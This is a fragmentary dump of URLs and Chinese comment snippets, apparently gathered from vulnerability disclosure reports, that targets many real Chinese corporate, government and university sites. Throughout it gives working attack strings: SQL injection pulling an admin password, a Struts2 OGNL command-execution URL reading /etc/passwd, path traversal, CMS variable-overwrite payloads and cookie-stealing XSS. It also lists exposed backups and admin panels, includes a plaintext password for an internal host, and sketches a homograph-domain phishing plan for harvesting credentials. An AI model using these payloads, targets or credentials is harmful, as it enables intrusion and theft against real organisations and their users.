http://bbs.lenovo.net/data/download/14067/tv.php._addons_ http://bbs.lenovo.net/install/data/ http://ams.lenovo.com.cn:81/files/ http://ams.lenovo.com.cn:81/db/ http://support4.lenovo.com.cn:8080/downloads/ http://bbs.lenovo.net/phpinfo.php http://ideaphone.lenovo.com.cn/test.php http://219.142.122.128/ewebeditor/admin/ http://ideaclub.lenovo.com.cn/forum/forum.php?mod=viewthread&tid=239&pid=1961&page=12&extra=#pid1961 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://emapp.cn/tb/taobao/appstore/toDownload.action http://passport.weiphone.com/?r=user/lostPwdRequest2 http://192.168.1.106/admin/Category_GetSearch.aspx?key= http://kf.mopo.com/web/faqWebAction!noticeView.action http://forum.freebuf.com是FreeBuf之前的论坛,现在关闭了,用的discuz!,用户中心是UCenter http://forum.freebuf.com/uc_server/admin.php http://www.tallk.cn/feedbackWeb/list.action http://www.sdds.zjb.gov.cn/ http://www.sdds.zjb.gov.cn/index.php?m=search&c=index&a=public_get_suggest_keyword&url=test&q=../../phpsso_server/caches/configs/database.php http://www.99inn.cc/StoreInfoDetails.aspx?StoreID=021024%27%20and%20%28select%20top%201%20pwd%20from%20tb_users%20where%20username=%27admin%27%20%29=1--+ http://www.99inn.cc/AdminLogin.aspx http://login.tudou.com/reg.do?act=isRegisteredNickname4Reg&callback=wooyun http://tjpt.my.tudou.com/tjpt/recommend?pcode=10000100&callback=wooyun http://marketing.tudou.com/tianlei/shumenol2/upload.php http://www.ex-silver.com/huiyi/2.php?channel_id=47&news_id=21 http://www.v5shop.com.cn/case/20120609/8891/index.php http://www.gjxwsbs.com/admin/ http://vip.book.sohu.com/user/dashang/dashang_wap.php?book_id=131101 http://www.ipmall.org.cn/phpmyadmin/ http://forum.kugou.com/showtopic-326440.aspx http://wapchat.tom.com/ http://wapchat.tom.com/index.html http://wapchat.tom.com/info.txt http://wapchat.tom.com/manage/ http://www.jhkkk.com/admin/main.html 
http://192.168.1.106/Admin/action.ashx http://ititit-upload.stor.sinaapp.com/tmp.zip qq.com/123456 http://s.haier.com/ http://localhost:8080/km100survey/faces/public/re_email_password.jsp?email=wooyuntest1@163.com http://192.168.1.106/admin/pinglun.asp?id=71 https://passport.17173.com/ http://125.71.232.30/login http://bankcomm.tudou.com/bankcomm/user.getDigNum.do?r=0.4318580571562052 http://chinatelecom.95081.com/cms/photo/photoContent!getPhotoContent.action http://www.gjks.com.cn/ http://www.conghua.zp300.cn/sywd/sort.php?ID=1 http://a.xcar.com.cn/preference/index.php?action=Current&method=apply&cid=475&ccid=2016 http://www.exiaoke.com/order/buy!quickbuy.action http://219.147.55.173:8010/login!loginInput.action http://www.156.cn/loginUser!shenqu.action www.hebcrj.com/xquery/xquery-search.action http://www.hebcrj.com/Silic.jsp http://cx.ytjj.gov.cn:9081/ytjjvio/vehvio.action http://cx.ytjj.gov.cn:9081/ytjjvio/Silic.jsp http://221.232.141.235:8082/regonline/qzsp.jsp http://221.232.141.235:8082/ICSP/page/ywjdcx_init.action http://221.232.141.235:8082/ICSP/Silic.jsp http://www.nmds.gov.cn:9999/invoice/invoice!index.action http://www.nmds.gov.cn:9999/Silic.jsp http://wapchat.tom.com/manage/ http://www.jltgw.com/pcsEdelr!find.action http://www.jltgw.com/Silic.jsp http://hk.gtja.com/zqscInfo/FundList.aspx?NodeID=739 http://webmail.xinnet.com http://webmail.xinnet.com/app/mailset/mailSign/operate?method=addMailSignature&sigId=&isHtml=false&sigSubject=%E9%BB%98%E8%AE%A4%E7%AD%BE%E5%90%8D&defaultSig=true&signatureContent=签名内容 http://xssplatform.xss.com/xss?1378700262 http://webmail.xinnet.com/app/mailset/mailSign/set http://ziyuan.51taoshi.com/fore/myzycenter/showMyzy.action http://ziyuan.51taoshi.com/fore/zycenter/viewZy.action?zid=201309061907070015 http://www.maxthon.cn/admin/admincp.php www.maxthon.cn http://118.122.113.71:8780/login.do http://www.18touch.com ip:192.168.100.6 pwd:E%vdGd~2 http://www.scrftb.gov.cn/searchlist.aspx?page=2&s=1 
http://www.scrftb.gov.cn/searchlist.aspx?page=2&s=1'%22” http://maishihui.womai.com/ http://expert.womai.com/maifood/wp-login.php http://service.zlqh.com/cn/web/user_login.aspx http://service.zlqh.com/cn/ http://service.zlqh.com/cn/ajax/getdaylist.aspx http://606app.cofco.com/app/pages/login.action http://118.145.26.216 http://www.xxs8.com/book_end_com.php?book_id=165350%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E http://code.taobao.org,就是它了,登录什么的最烦人。 http://code.taobao.org/svn,5364个子目录,资源库啊!!!!!!!! VERSION:1.2.2 http://cglx.51taoshi.com/content.php?id=262 http://www.cofcohg.com/?m=Index&a=about_show&id=11 http://www.cofcorice.com/admin/ http://123.234.41.43/web.rar http://recite2.super.yeshj.com/superadmin/statistics.aspx http://hz.cofcopack.com:8080/Jobs2.aspx?Cid=10 http://hz.cofcopack.com:8080/admin/adminlogin.aspx http://www.yhachina.com/topic.php?channelID=1&topicID=203 http://club.guoao.com.cn/vipuser/tologin.action http://www.beta.ulechina.tom.com/ http://www.beta.ulechina.tom.com/yummi_beta/.ssh/authorized_keys http://duokoo.baidu.com/novel/?R=493&v=2&pageid=E70dlhtt&bck=1386&jump_p_id=M5ht79md&logout=1&uid=4850E0C9145E3CB2EFC9AAE552E0F3F8&netFlag=cmnet&dkfrc=1&usid=12B6E38CACEE17F2B7022F8938B94F91&rdtp=0 http://www.igoodcar.cn/car/news!show.action http://bank.ecitic.com/personal/ http://175.6.0.122/index.php?m=main&f=login pinglun.07073.com/manage.php http://www.wengyuan.gov.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://nokia-imaging.tom.com.cn/manage/index.jsp http://www.cdjustice.chengdu.gov.cn/justice_sfjd/quire/quiresallist.action http://124.160.11.208:8080/prm/Login!input.action www.cofco-trust.com http://www.cofco-trust.com/templates/T_yestem_column/index.aspx?nodeid=%22%22 http://www.cofco-trust.com/console/login.aspx http://space.51taoshi.com/ 
http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://emkei.cz/ http://e-learning.lenovo.com.cn//css/admin/.svn/entries http://访问源进行了限制,而对https的配置并未生效,导致仍然存在缺陷。 https://changba.com/.svn/entries https://changba.com https://changba.com http://www.kulv.com/repos/kulv/KTV/www http://www.kulv.com/repos/kulv http://developer.meizu.com/faq/faq_addgetting.jsp# http://202.108.15.61/Orion/Login.aspx http://xjd.tcl.com/showclick.asp?guid=20130422184740176 http://news.17173.com/zt/2013/kxj/index.shtml www.3gcare.cn/ http://www.365fanyi.com http://forums.pku.edu.cn:80/conference_blue/content.php?hy_id=-1%20or%2041%3d39&id=34 http://forums.pku.edu.cn/admin/admin_login.php http://school.51taoshi.com/M4sk.txt http://506srm.cofco.com/custom http://km.cofco.com/user//user/login.php?UserName=&Password=&action=Reuse&isResult=1 http://media.cofco.com/uploadfiles/文件泄露 http://www.js11183.com/Profile.jsp?id=01 http://site.vegaga.com/user/toLoginRegister.action http://site.vegaga.com/user/toLoginRegister.action http://www.fynews.net/Data/data.rar http://www.tcl.com/.svn/entries http://shop.tcl.com/.svn/entries http://shop.tcl.com/test2.php http://shop.tcl.com/memcache.php http://mail.21cn.com/ http://58.60.230.1:81/ http://58.60.230.1:81/config/conn.asp http://58.60.230.1:81/config/ http://58.60.230.1:81/ch/dbmanager/login.aspx http://58.60.230.1:81/ch/dbmanager/ http://58.60.230.1:81/print/ http://www.maipu.cn/news.aspx?key=mico%'+and+1=1+and+'%'= http://www.maipu.cn/news.aspx?key=mico%'+and+1=2+and+'%'= inurl:doc/page/login.asp http://jtjt.pukou.gov.cn/ http://ebidding.lenovo.com.cn/backoffice/getPass http://sqlmap.org http://ebidding.lenovo.com.cn:80/backoffice/getPass.aspx http://open.youku.com/assets/lib/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// http://t.youc.com/ 
http://www.xinfeng.gov.cn/1.txt http://newsletter.zhongliangwomai.com:8081/smartedm/welcome.do http://www.65601111.com/news!naviNewsDetail.action?id=19 http://58.60.230.24/ http://58.60.230.24/dianzi.aspx?id=34 http://58.60.230.24/admin/1.aspx http://www.topfreeweb.net/CompanyInformation/companyInformationAction_showdetails.action?id=7 http://110.75.66.103/carnival/history/schedule/2013/detail/main/261 http://110.75.66.103:80/carnival/history/schedule/2013/detail/main/261 http://www2.easou.com:8080/views/login.jsp www.wooyun.org/bugs/wooyun-2010-011192 www.wooyun.org/bugs/wooyun-2010-011192(一哥说得对,反射型xss的危害可大可小) wpa.qq.com/msgrd?V=1&Uin=【QQ号】&Site=ioshenmue&Menu=yes原理是访问这个地址然后鼠标模拟点击“加为好友”、“下一步”,鼠标录制可以简单完成这项工作。 http://115.182.51.86/wenba/my_answer.php?status=1 http://www.ihangjing.com/admin/upfile/Upload.html?Links只在前端过滤。后台没有做过滤处理。 svn://svn.corp.gfan.com/home/projects http://117.79.[马赛克]:8080 http://www.tfle.thtf.com.cn/news-ultimate.php?id=92 http://lt.imobile.com.cn/uc_server/admin.php http://www.00544.com/.svn/text-base/config.inc.php.svn-base http://www.00544.com/info.php http://news.7k7k.com/ceshi/ http://www.tuanlego.com/User-login.html www.tuanlego.com http://www.tuanlego.com http://msla.hz.letv.com/servlet/mslaInfo?id=1 http://www.dmshu.com//plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&arrs1[]=108&arrs1[]=101&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=100&arrs2[]=97&arrs2[]=116&arrs2[]=97&arrs2[]=47&arrs2[]=99&arrs2[]=111&arrs2[]=109&arrs2[]=109&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=105&arrs2[]=110&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=0 http://shop.letv.com/user/center/orderPay.html?orderId=1309111506618&orderPrice= http://shop.letv.com/user/center/orderPay.html?orderId=1309111503377&orderPrice=0.1&payMentMethodId=ON-LEZF-ALIPAY-BALANCE-ALP&stage=1 http://m.189gs.com/ 
http://i.bufan.com/plus/index.php?con=soft&action=show&aid=367 http://a.bufan.com/plus/index.php?con=soft&action=show&aid=367 http://i.bufan.com/plus/index.php?con=soft&action=show&aid=367 http://i.bufan.com/plus/index.php?con=soft&action=show&aid=367 http://www.eecn.com.cn/about/login.action http://117.79.80.22:8082/login http://117.79.80.22:8082/gfan/home http://www.youku.com/playlist_show/id_19875897.html http://zhibonet.com/iptv2/view/familyChannelList.action http://www.icoou.com/files/ http://www.icoou.com/files/2012/07/23/20120723114823_7320.txt http://jk.easou.com/upload/ http://118.145.13.12/ http://120.197.95.240:8080/ http://120.197.95.104/ http://api.mam.sdo.com/pay.php?phoneid=手机号&ordersn_game=MA_APPLE_60MC&money=6.0¬ifyurl=http%3A%2F%2F10.31.23.133%3A10001%2Fconnect%2Fweb%2Fpayment%2Fsnda_verify_receipt&ext=手机号&channel=M216&itemname=60MC&appid=1000 http://data.bd.baofeng.com/ http://data.bd.baofeng.com/gotologin.box http://data.bd.baofeng.com/admin/main.jsp http://vip.club.sohu.com/szzmjc/manage/sort?num=1&id=XX vip.club.sohu.com/szzmjc/models/zmjc.php http://www.36kr.com/account/edit http://xss.tw/xxxx http://www.36kr.com/u13789163xx,发现title直接调用了用户个性签名内容,由于该处调用未进行输出导致xss代码执行。(看官见谅,马赛克打的有点晕。) http://www.cecb2b.com/brand/index.do http://market.bitauto.com/webadmin/ http://www.99inn.cc/Club.aspx?id=38 http://www.avic.com.cn:81/rczpzb/zpxx.asp?sid=469 http://www.ssfdc.gov.cn/details.php?id=1695 www.cnpubg.com http://mail.cnpubg.com/ http://mail.cnpubg.com/help/list.swf http://mail.cnpubg.com/include/config.inc http://www.baitw.com/help.action http://www.gcdr.gov.cn/1.rar http://usercenter.joy.cn/usercenter.do?m=userInfo&var=%3E%3Cscript%3Ealert%28%27Hello%20World!%27%29%3C/script%3E&charset= http://dig.chouti.com/link/5194578 http://dig.chouti.com/link/self/add?linksId=帖子ID http://dig.chouti.com/link/self/del?linksId=帖子ID clsid:43D36B68-DB27-4250-A584-F5F5A381C3FE http://cbnclub.yicai.com/assets/ http://cbnsearch.yicai.com/phpinfo.php 
http://m.hujiang.com/ http://m.hujiang.com/en/p531890/ http://ts.hjenglish.com/yingyu_guanlian/432522/ http://kefu.hujiang.com/feedback/ www.shouye.com http://jinyuedb.com/admin http://jinyuedb.com/admin/sctp.aspx https://www.labi.com/resetPassword http://acg.07073.com/plus/view.php?aid=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&arrs1[]=108&arrs1[]=101&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=100&arrs2[]=97&arrs2[]=116&arrs2[]=97&arrs2[]=47&arrs2[]=99&arrs2[]=111&arrs2[]=109&arrs2[]=109&arrs2[]=111&arrs2[]=110&arrs2[]=46&arrs2[]=105&arrs2[]=110&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=0 https://passport.gozap.com/findPassword!reset.action?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://www.vmaibo.com/.svn/entries http://biz.vmaibo.com/.svn/entries http://read.vmaibo.com/.svn/entries http://vmaibo.com http://vmaibo.com svn://127.0.0.1:3396/vmaibo-person svn://127.0.0.1:3396 http://read.vmaibo.com http://read.vmaibo.com svn://219.239.***.*:3396/vmaibo-read svn://219.239.***.*:3396 http://rtoct.mspcloud.cn/rtc_client/RTCWebClient/pinInput.action http://www.lagou.com/lagouAdmin/logins http://www.ls12365.gov.cn/www.rar http://www.bdszjj.com/1.rar http://cbnxy.yicai.com/data/ http://cbnxy.yicai.com/images/ http://cdms2011.yicai.com/images/ http://cdms2011.yicai.com/data/ http://cfv.yicai.com/images/ http://csr.yicai.com/images/ http://cxcx.yicai.com/images/ 
http://www.vogue.com.cn/fno/2013/ibrand.php?sellerid=11 http://fwzx.fy.gov.cn/fwzx.rar http://m.liveuc.net/baidu/dbcall/,这个地址,应该是百度的,这个比较奇葩的是直接把各个会议室的地址写在js中,直接登入了会议室参加培训吧。 www.Solidot.org www.solidot.org/~用户名 www.solidot.org/~xj5306 https://3g.mbs.boc.cn/BOCWapBank/OVPLognFwLoginPwdMod.ovpdo?country_key=GB%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://open.letvstore.com/ http://open.letvstore.com/update_version.html?108959 http://www.sjz12365.gov.cn/www.sjz12365.gov.cn.rar http://www.cxzw.gov.cn/web.rar http://guodiantong.sgepri.sgcc.com.cn http://www.gzaj.gov.cn/database.rar http://www.xczj.gov.cn/xczj.rar http://www.butao.com/static/express/biz_express_8.xls http://www.butao.com/static/express/biz_express_8.xls http://www.butao.com/static/express/biz_express_9.xls http://passport.baidu.com/?business&aid=6&default_tab=1&un=XXXXXXXXXXXX#1 http://tieba.baidu.com/f/upost?un=%CE%E1%CE%AA%B4%F3%D6%F7%D4%D7&t=1378993929110&pn=X&rn=X http://www.qgsp.gov.cn/111.rar data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://www.imcoal-safety.gov.cn/www.imcoal-safety.gov.cn.rar http://my.xcar.com.cn/favorite/index.php?action=addthread&id=19454122&title=helloaika¬ing=a.jpg http://www.xcar.com.cn/bbs/my.php?item=favorites&tid=19454122&inajax=1¬ing=a.jpg http://live.baomihua.com http://3g.mop.com/login.jsp http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://member.aili.com/?c=member&m=member&a=editpersonal&data%5Bname%5D=test&data%5Bsex%5D=0&data%5Bbirthday%5D=1970-01-01&data%5Bstar%5D=&data%5Bprovince%5D=&data%5Bcity%5D=&data%5Barea%5D=&data%5Bprofession%5D=%CF%FA%CA%DB&data%5Bmarriage%5D=0&data%5Beducation%5D=0&data%5Btip%5D=test www.leliu.gov.cn/nanshui/bg/leftword.aspx?page=1&title=&type= http://i.qichetong.com/uXXX/!forum/ http://i.qichetong.com/u2/!forum/ http://i.qichetong.com/u2192830/!forum/ 
http://www.bjchy.gov.cn/login.jsp http://202.117.3.47/admin/index.do http://202.117.3.47/uploadFile/1378917041999.jsp http://www.tcxzzx.gov.cn/wwwroot.rar http://t.yicai.com/.svn/entries http://t.yicai.com/.svn/all-wcprops http://t.yicai.com/source/.svn/entries https://10.10.140.42:88/svn/dev/cbnsns/source https://10.10.140.42:88/svn/dev https://10.10.140.42:88/svn/dev/cbnsns https://10.10.140.42:88/svn/dev http://202.113.16.3/ http://202.113.16.50/ http://duokoo.baidu.com/novel/?R=517&v=2&pageid=E70dlhtt&bck=1386&jump_p_id=M5ht79md&logout=1&outoken=d1f753d5ba3d557beda7715e09f9b61e&ssid=0&from=0&bd_page_type=1&uid=4850E0C9145E3CB2EFC9AAE552E0F3F8&pu=sz%40224_220%2Cta%40middle___3_537&fr=home&netFlag=cmnet&usid=062921E7609FB5C3A8A80BEB1CDD97B1&rdtp=0&dkfrc=1 http://xin.766.com/fahao/index.php?c=xin&m=content&accid=51 www.sy-kingdee.com/Products_show.asp?mid=95 http://www.3wcoffee.com/主站.试了下几个账号 http://exmail.qq.com/cgi-bin/readtemplate?check=false&t=biz_rf_portal#recovery http://serviceshop.lenovo.com.cn/ http://serviceshop.lenovo.com.cn/purchase/orderconfirm.aspx?orderNo=B0130913000031 http://serviceshop.lenovo.com.cn/purchase/orderconfirm.aspx?orderNo=B0130912000012 http://webmail.iscas.ac.cn/login.action http://video.cast.org.cn/index.php?option=com_content&id=701%20id=701 http://topic.xcar.com.cn/201005/dh/zp.php?page=3&sort_id=4 http://topic.xcar.com.cn/201005/dh/zp.php?page=3&sort_id=4 http://www.114school.cn/xytypt/typt/index/userlogin.jsp http://www.yonyou.com.hk/new/download_view.php?uid=4 http://sus.lenovomm.com http://sus.lenovomm.com/adpportal/application/delete.do?appId=11503&pageNumber=1 http://219.239.230.4:8090 http://219.239.230.4:8090/index.php/list/index?ct=file&ac=userfile&aid=2&cid=0&tpl=view_pg&limit=35x&_t=1378971582006&o=file_name&a=1 http://b2b-hk.ce-air.com/MUB2B/login.do http://www.ad4app.cn/forgetPassword.do http://www.dyzs189.com/bnet/user-login!password.do http://www.carpad.com.cn/Portal/web/customer/password.action 
http://www.appeasou.com/user!userLogin.action http://ny.agri.gov.cn/index/ http://219.141.228.206/ http://zhidao.baidu.com/expert/api/browse?cid=undefined&pn=1&rn=16 http://active.zhongliangwomai.com:8080/smartredm/welcome.do http://invite.zhongliangwomai.com:8080/smartredm/welcome.do http://218.241.156.29:8080/smartredm/welcome.do http://www.yyjzt.com/fckeditor/editor/fckeditor.html http://www.yyjzt.com/uploadfiles/Image/X.jsp http://202.113.16.117/ http://202.113.16.117/cgi-bin/bbs/bbshelp?file=../../../../../../../../../../etc/passwd http://202.113.16.117/cgi-bin/bbs/bbshelp?file=../../../../../../../../../../etc/my.cnf http://202.113.29.5/ data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://v.dahe.cn/index.php?option=com_content&ItemId=91%20ItemId=91 http://localhost/test.asp;/1.txt https://passport.lenovo.com/wauthen/resetpassword.jsp e-learning.lenovo.com.cn/user/registration http://e-learning.lenovo.com.cn/user/registratio http://ideaclub.lenovo.com.cn/club/ http://www.vmaibo.com/sentiment/getKeywords?limit=5 http://www.vmaibo.com/sentiment/getKeywords?limit=5/*!5010000x*/ http://www.vmaibo.com/sentiment/getKeywords?limit=5/*!5020000x*/ http://www.vmaibo.com/sentiment/getKeywords?limit=5/*!5030000x*/ http://www.vmaibo.com/sentiment/getKeywords?limit=5/*!5040000x*/ http://www.vmaibo.com/sentiment/getKeywords?limit=5/*!5050000x*/ http://www.vmaibo.com/sentiment/getKeywords?limit=5/*!5060000x*/ http://www.baima.com/ http://219.239.230.4:28017/ http://219.239.230.6:28017/ http://219.239.230.8:28017/ www.tianshui12388.gov.cn/​admin/​admin_​add.asp http://www.dfyb.com/newcenter/NewsCenter_List.asp?newsclass=2&newstype=%C3%BD%EF%BF%BD%E5%B1%A8%EF%BF%BD%EF%BF%BD http://www.nqssfj.gov.cn/nqssfj.rar http://me.07073.com http://www.wdpfw.gov.cn/1.rar http://www.ynmj.gov.cn/wwwroot.rar http://www.cdswbb.gov.cn/wwwroot.zip https://116.77.72.213/Java/jviewer.jnlp http://www.ngjw.gov.cn/1.rar http://www.qdnsf.gov.cn/qdnsf.rar 
http://www.masdl.gov.cn/database.rar www.taоbao.com),浏览器会自动识别为:www.xn--tabao-kye.com www.xn--tabao-kye.com,到万网查询,是可以注册的 www.xn--tabao-kye.com里加入跳转代码,跳回淘宝官方网址,利用中间跳转的几秒做文章,用户只会感觉打开稍慢,并不会有其他疑问,同时可以跳出个弹窗,让提交个账号密码啥的。 http://www.ycsjyj.gov.cn/web.rar http://www.sqmlr.gov.cn/qlyg_web/sb.jsp?itemid=JS130000GT-QR-0001 http://erp.suning.com.cn/login.jsp http://hndczx.mep.gov.cn/pub/dcwh.jsp?s=dcyj http://bbs.aoshitang.com/ http://xsst.sinaapp.com/xsstest1.swf?test=xsstest http://115.182.51.86/ http://115.182.51.86//wenba/my_answer.php?status=1'%22 http://www.diocoffee.com/ http://www.diocoffee.com/1937cN.txt http://www.ubc-coffee.com.cn/a.asp;.jpg http://b2bkm.suning.cn:9080 http://b2bkm.suning.cn:8787/MyPhoto/1_0_fbb204a4061ffbd41284a84c258c1bfb.txt http://www.xiaomi.cn/html/special/MiFlash/ http://licaike.hexun.com/SysDetail.action?seqId=00001013 http://ewp.suning.com.cn/main/login.jsp http://ewp.suning.com.cn http://www.enkj.com/fastlogin/weibo/return_url.asp?id= http://venus.suning.com/ http://venus.suning.com/TestDemo/WebForm2.aspx http://bbs.liebao.cn/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf[/flash http://bbs.liebao.cn/forum.php?mod=viewthread&tid=180164&page=6&extra=#pid4069459 http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u004a\u0064\u0073\u0065\u0063\u0022\u0029\u003e/1.swf[/flash http://bbs.app111.com http://iosfile.feng91.com/album/cover/9b/15.jpg http://bbs.app111.com/data/attachment/album/cover/9b/15.jpg http://bbs.app111.com/test.php http://bbs.app111.com/data/.svn/entries http://svn.pcpop.com/svn/searchbbs/bbs/it168/ios/trunk/data_dist http://svn.pcpop.com/svn/searchbbs svn:special svn:externals svn:needs-lock http://kpym.cast.org.cn/cms/contentmanager.do?metho 
http://pan.baidu.com/share/link?shareid=3236949238&uk=102124124 http://tyj.zhengzhou.gov.cn/ http://tyj.zhengzhou.gov.cn/sysadmin/login.do http://www.dengfeng.gov.cn/sysadmin/login.do http://www.lyjjw.gov.cn/sysadmin/login.do http://www.zzta.net/sysadmin/login.do http://www.chtongxu.gov.cn/sysadmin/login.do http://www.xinxiang.gov.cn/sysadmin/login.do http://kf.dxyq.org/sysadmin/login.do http://www.zhongyuan.gov.cn/sysadmin/login.do http://dxyq.zzsdc.com/sysadmin/login.do http://zznet.com.cn/sysadmin/login.do http://www.lhhbj.gov.cn/sysadmin/login.do http://ww.ty.gov.cn/sysadmin/login.do http://www.hajz.hrss.gov.cn/sysadmin/login.do http://www.xcnj.gov.cn/sysadmin/login.do http://e-learning.lenovo.com.cn http://e-learning.lenovo.com.cn/user/recovery host:10.15.186.247 http://www.zxnq.gov.cn/Admin_Add.asp http://www.adbc.com.cn/a.zip http://61.132.0.41/ http://tee.sports.sohu.com/help/badword.php http://www.iwoak.com/sage/sagenews.aspx?TypeID=94 http://xx.com/123 http://czj.tz.gov.cn/czj/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/aspx/connector.aspx http://www.tudou.com/plcover/92Izzv8fVeo/ http://lvyou.baidu.com/notes/0433214497bc2d0992adf09c http://mrp.nsfc.gov.cn/?mn=main&mo=news&mv=N&nid=32 http://jtst.moc.gov.cn:8086/ShowPage.aspx?pid=502 http://v2.freep.cn/3tb_130915105320dmy8512293.jpg www.bjchy.gov.cn/login.jsp www.sczhb.com/admin/ www.jiangxian.gov.cn/admin/ www.linzi.gov.cn/login.jsp www.wendeng.gov.cn/web.aspx http://coop.xuwen.gov.cn/xj.asp www.yqcq.gov.cn/Databases/0791idc.mdb www.sccw.gov.cn/KS_Data/KesionCMS5.mdb www.shidao.gov.cn/11.rar www.gzz.gov.cn/website.rar www.tianshui.gov.cn/1.rar www.qyzwfw.gov.cn/admin/aspcheck.asp www.lzflcp.com/ zhxy.hubu.edu.cn/onet/jpkc/rwdl/admin/Databackup/1.asa www.sxmu.edu.cn/admin/fckeditor/editor/fckeditor.html www.sxtvi.edu.cn:9080/admin/login.aspx .snnu.edu.cn/admin/ https://www.dnspod.cn/proxy_diagnose/recordscan/dnspod.cn?callback=xsscode 
https://www.dnspod.cn/proxy_diagnose/recordscan/dnspod.cn?callback= http://202.45.69.33/lib http://book.weibo.com/booklist/12188 http://www.lzhc.gov.cn:8082/general/ http://www.lzhc.gov.cn:8082/mysql/index.php http://leader.railstone.com.cn/ http://www.railstone.com.cn/rems/file/downloadFile.action?actionType=success&\suffix=jpg&filePath=/etc/passwd&fileName=a.jpg http://www.railstone.com.cn/rems/poramount/${pageContext.request.contextPath}/rems/file/downloadFile.action?actionType=success&suffix=jpg&filePath=/etc/passwd&fileName=head1.jpg http://chat.soufun.com/zhibo/manage/login.aspx http://you.ctrip.com/members/photos/AlbumUpload.aspx http://211.136.119.121:30025/zhgy/userAction/loginInit.action http://vdisk.weibo.com/s/z1id0otCRMVPt http://www.kaixin001.com/home/ http://top.cn.msi.com/connect.aspx?id= http://info.02156.cn/NewsMessage.aspx?newsid=2187 http://www.mogujie.com/settings/personal http://www.suning.com.cn/djgz/category.asp?id=1 data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= data:text/htmlbase64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= data:text/html;base64,PHNjcmlwdD5hbGVydCg0MSk8L3NjcmlwdD4= http://careers.suning.cn/rps-web/ftl/resume/personalResume.htm http://go108.astro.women.sohu.com/wish_tree_otherswish.php?id=2593 http://go108.astro.women.sohu.com/wish_tree_otherswish.php?id=2593 http://go108.astro.women.sohu.com/wish_tree_otherswish.php?id=2593 http://go108.astro.women.sohu.com/wish_tree_otherswish.php?id=2593 http://58.135.253.9/masmanage/mas_page/ http://58.135.253.9/masmanage/mas_page/system/login.do data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://202.117.24.168/cm/main.jsp http://202.117.24.168/cm/detailxml?internalid=245462 http://202.117.24.168/manager/html/ http://baike.baidu.com http://www.digitalchina.com/ http://venus.suning.com/ http://venus.suning.com/TestDemo/WebForm2.aspx http://58.248.41.223/main/UserManager-esmsLogin.action http://m.test.app.uc.cn/app/index.php?system=admin 
http://124.133.52.150/study/admin.php/Index/login http://duiyi.tom.com/.svn/entries http://dealer.auto.sohu.com/tianbao/index.html http://parse.at.zhihu.com:8567/wooyun http://www.mogujie.com/trade/generateorder/account# www.mogujie.com http://tv.hebei.gov.cn/default.aspx?pdid=dbc5a998-5765-4f03-b1b9-6d0b8bf724fa http://xinfang.nanning.gov.cn/getpwd.asp?DepartNo=001000000000&UserName= http://canlian.kaiping.gov.cn/ http://219.141.254.195/djqy/integration/InfoManager/ http://219.141.254.195/djqy/integration/ http://219.141.254.195/djqy/integration/InfoManager/addAction.jsp20111102 http://219.141.254.195/djqy/integration/InfoManager/infoItemList.jsp20111025 http://219.141.254.195/djqy/integration/productMaintanance/addProductMaintanance.jsp?protypeid=1&corid=20060508134929875&organid=73103&opttype=add http://219.141.254.195/djqy/fileupload/fileMod.jsp?tableName=t_asb_hasfiles&sourceID=21200822&filetype=20 http://219.141.254.195/djqy/fileupload/fileMod.jsp?tableName=t_asb_hasfiles&sourceID=21200822&filetype=21 